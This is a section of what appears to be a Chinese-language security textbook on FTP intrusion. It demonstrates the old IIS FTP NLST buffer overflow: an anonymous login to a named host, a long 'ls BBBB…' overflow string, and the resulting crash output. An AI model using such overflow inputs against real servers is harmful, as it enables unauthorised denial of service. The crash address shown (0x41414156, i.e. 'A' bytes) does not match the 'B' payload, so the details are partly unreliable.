6.10 基于FTP入侵攻击

    

6.10  基于FTP入侵攻击

现在很多的站点用FTP服务来更新网站，但是微软的FTP服务还是使用第三方软件如：serv-u、wuftp，但它们都存在着严重的漏洞。接下来将介绍一些有关FTP服务存在的漏洞及入侵测试。

6.10.1  IIS FTP远程溢出漏洞

在IIS FTP服务器中NLST命令存在一个缓冲区溢出漏洞，这个漏洞可能使攻击者在服务器上非法运行一条命令，如果溢出地址不正确的话，也可能会造成服务器关闭。

受影响的系统：

Windows NT 4.0 (SP4) IIS 3.0 / 4.0 

Windows 95/98 PWS 1.0

攻击测试 ：

(1) 找到一台Windows NT4.0服务器，并提供FTP匿名登录服务，这里以www.ffhh.net为测试对象。接下来打开MS-DOS程序(Windows 2000操作系统打开命令提示符)，在命令提示符下，攻击侵者向目标机输入以下格式：

ftp  www.ffhh.net

如图6-96所示。

图6-96  以FTP方式登录到www.ffhh.net主机

提示：

Microsoft FTP service (Version 4.0)这里是指测试服务器所使用的FTP版本为：微软公司的4.0版本，从230 Anonymous user logged in可以看出，登录的方式为匿名登录，匿名用户只有对服务器上的数据读的权限，所输入的用户名是ftp,在要求输入密码时，可以为空，也可以填写一个E-mail地址即可。

注意：

一般情况下匿名登录用户名为 Anonymous ，在输入用户名时输入Anonymous，密码为空或是输入一个E-mail地址后直接按Enter键即可。

(2) 在FTP命令下输入以下内容：

ls   BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

如图6-97所示。

图6-97  攻击测试

提示：

服务器显示150 Opening ASCII mode data connection for file list，说明该服务器关闭。

(3) 此时被测试的服务器关闭，服务器端反映如下：

The instruction at '0x710f8aa2' referenced memory at '0x41414156'

EAX = 0000005C EBX = 00000001